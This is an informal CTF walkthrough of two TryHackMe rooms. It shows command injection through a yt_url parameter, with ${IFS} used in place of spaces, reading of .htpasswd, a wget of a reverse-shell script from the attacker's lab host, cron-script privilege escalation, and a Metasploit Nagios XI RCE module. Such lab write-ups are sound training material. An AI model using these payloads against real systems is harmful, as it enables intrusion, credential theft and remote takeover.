TryHackMe — ConvertMyVideo

It’s a very good lab and you can test lots of different topics at the same time;

# I scan with nmap

sudo nmap -sV 10.10.124.59

# find web port to open and browse it;

# in parallel I start dirbsearch to find folders

sudo ./dirsearch.py -u http://10.10.124.59 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e js,php,html -x 403,404

# so first question answer we find quickly /admin folder our secret folder;

#so I understand basic Authentication and user credential need; I started password attack and also the as same time I started to web application testing

in Burp i start request manipulations ;

First thing i investigate yt_url part when i write

# |ls

i can execute my command, and after that, i think very simple room to solve;

#but after that i sent lots of Linux command and take every time to error; so i more create error and search from internet youtube-dl

# i find source code off youtube_dl

ytdl-org/youtube-dlyoutube-dl – download videos from youtube.com or other video platforms To install it right away for all UNIX users…github.com

# my test i every time took error about not true parameter and options; so when looked github page i saw valid options

# and send first option — help over burp

yt_url — help

and bingoo — help options worked for me; all help information i can saw in response ,

# after that step i try to send more powerful command which one help to reach my aim, and i spend 1,5 about that;

#main problem simple command like ls, id executed but when i try to execute ls -al every time take syntax errors; so i more focus sent command without space;

#Google best helper me search :

“How to send a command with arguments without spaces?”

How to send a command with arguments without spaces?Thanks for contributing an answer to Unix & Linux Stack Exchange! Please be sure to answer the question. Provide…unix.stackexchange.com

and find a true perspective

cat${IFS}file.txt

So using ${IFS} i can send command using without space; but before this job i send all my request burp repeater to more efficiently manipulation;

#please be careful that part because our parameter must be;

— version;ls${IFS}-al;

note: (- -) in the display looks like — and also you can use all option — help; — execute, — version

#so i can access all command that method; now i try to access /admin folder;

yt_url= — version;ls${IFS}/var/www/html/admin${IFS}-al;

# found .htpasswd and flag.txt

for reading flag.txt

yt_url= — version;cat${IFS}/var/www/html/admin/flag.txt;

and as the same method when you look to .htpasswd;

yt_url= — version;cat${IFS}/var/www/html/admin/.htpasswd;

you can find user;

Now i need to ever shell to execute for that reason i prepare bash based reverse shell.sh in my kali computer.

and start my kali

python -m SimpleHTTPServer 8090

and over burp vulnerable machine i try to install that file

yt_url= — version;wget${IFS}http://10.9.32.166:8090/shell.sh;

— version;chmod${IFS}755${IFS}/var/www/html/shell.sh;

so i installed and give execution permission after that i start in my kali nc to listen;

when over burp start shell.sh have shell 🙂

–version;bash${IFS}shell.sh;

#when i have console i look all method spend 2 hours and last i find one way only change; is there clean.sh script under temp folder; and some cronjob execute it periodically and editable from my self; (how can i know only CTF experience)

so i try to execute that command;

echo ‘ cat /root/root.txt >root-oldum’ >>clean.sh

and bingo i have root-oldum file as the same directory includes root.txt flag.

Super CTF Thank you overjt

TryHackME — NAX- walkthrough

ROOM NAX https://tryhackme.com/room/nax

  1. Firstly need to read carefully the description of the room;

Nax

Identify the critical security flaw in the most powerful and trusted network monitoring software on the market, that allows a user authenticated execute remote code execution.

2. I started to search best network monitoring tools ;

https://www.pcwdld.com/best-network-monitoring-tools-and-software

3. This name so similar to our room Nagios XI (NAX)

4. Start port scanning

sudo nmap -sV 10.10.87.52

5. http://10.10.87.52

6. Welcome to Elements look like (periodic table ) so I start to search numbers;

https://www.ptable.com/

7. I create table convert element code to element number;

8. After that, I tried ascii to text

http://www.unit-conversion.info/texttools/ascii/

9. We find the first answer ;

10. Try to access http://10.10.87.52/PI3T.PNg

11. Extract EXIF info:

12. We find 2 answers:

13. After that I try to find known URLs and may be directories so I try dirbsearch;

./dirsearch.py -u http://10.10.87.52/ -e php,html

14. Find the default login page;

http://10.10.87.52/nagiosxi/login.php?redirect=/nagiosxi/index.php%3f&noauth=1

15. I did a small google search about nagiosxi default user name and password; and find default user name: nagiosadmin , password: PASSW0RD (with zero)

16. I try to #3 answer with the default username is ok.

17. But default username and password not true to login. After that hardest stage is started for me. What is the password? and how can I find it?. I spend 2,5 hours to find an answer.

18. I did google searching; focusing to picture which I found and steganography; I try all tools in that sites which wrote;

https://0xrick.github.io/lists/stego/

19. And find an interesting result which before I never heard

20. This method names look likes our Piet Mondrian names; so I more focus google search npiet online and found that site;

https://www.bertnase.de/npiet/npiet-execute.php

21. Below part of the picture, I found a password which starts %,

22. I was sure that system Nagios XI and start searchsploit;

23. So we find answer #5

24. Now start to configure metasploit, and configure;

Msf5> use exploit/linux/http/nagios_xi_authenticated_rce

Msf5> options

Msf5> set PASSWORD XXXXXXXXXXXXXXXX

Msf5> set RHOSTS 10.10.87.52

Msf5> set LHOSTS 10.9.32.166

25. We found #7 answer;

26. After run exploit;

Uraaaaa!!